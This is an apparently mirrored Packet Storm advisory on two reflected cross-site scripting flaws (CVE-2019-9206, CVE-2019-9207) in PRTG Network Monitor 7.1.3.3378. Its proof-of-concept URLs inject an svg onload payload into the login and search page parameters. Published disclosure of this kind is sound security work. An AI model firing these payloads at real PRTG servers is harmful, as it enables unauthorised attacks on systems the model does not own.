Lucene search
Rafael PedreroPACKETSTORM:151925HistoryMar 01, 2019 - 12:00 a.m.
PRTG Network Monitor 7.1.3.3378 Cross Site Scripting
2019-03-0100:00:00
Rafael Pedrero
packetstormsecurity.com
54
0.002 Low
EPSS
Percentile
58.8%
`In 2009...
<!--
# Exploit Title: Cross Site Scripting in PRTG Network Monitor v7.1.3.3378
# Date: 17-02-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.paessler.com/prtg
# Software Link: http://www.paessler.com/prtg
# Version: PRTG Network Monitor v7.1.3.3378
# Tested on: All
# CVE : CVE-2019-9206
# Category: webapps
1. Description
PRTG Network Monitor v7.1.3.3378 allows XSS via the /public/login.htm,
errormsg or loginurl parameter. NOTE: This product is discontinued. Update
to last version.
2. Proof of Concept
http://X.X.X.X/public/login.htm?errormsg=&loginurl=%22%3E%3Csvg%20onload=prompt%28/XSS/%29%3E
http://X.X.X.X/public/login.htm?errormsg=%22%3E%3Csvg%20onload=prompt%28/XSS/%29%3E&loginurl=XSS
3. Solution:
The product is discontinued. Update to last version.
-->
<!--
# Exploit Title: Cross Site Scripting in PRTG Network Monitor v7.1.3.3378
# Date: 17-02-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.paessler.com/prtg
# Software Link: http://www.paessler.com/prtg
# Version: PRTG Network Monitor v7.1.3.3378
# Tested on: All
# CVE : CVE-2019-9207
# Category: webapps
1. Description
PRTG Network Monitor v7.1.3.3378 allows XSS via the /search.htm, searchtext
parameter. NOTE: This product is discontinued. Update to last version.
2. Proof of Concept
http://X.X.X.X/search.htm?searchtext=%22%3E%3Csvg%20onload=prompt%28/XSS/%29%3E
3. Solution:
The product is discontinued. Update to last version.
-->
`
Related
prion
prion
Design/Logic Flaw
2019-12-31 17:15:00
Design/Logic Flaw
2019-12-31 17:15:00
nvd
nvd
CVE-2019-9207
2019-12-31 17:15:11
CVE-2019-9206
2019-12-31 17:15:11
cve
cve
CVE-2019-9207
2019-12-31 17:15:11
CVE-2019-9206
2019-12-31 17:15:11
cvelist
cvelist
CVE-2019-9206
2019-12-31 16:23:23
CVE-2019-9207
2019-12-31 16:23:27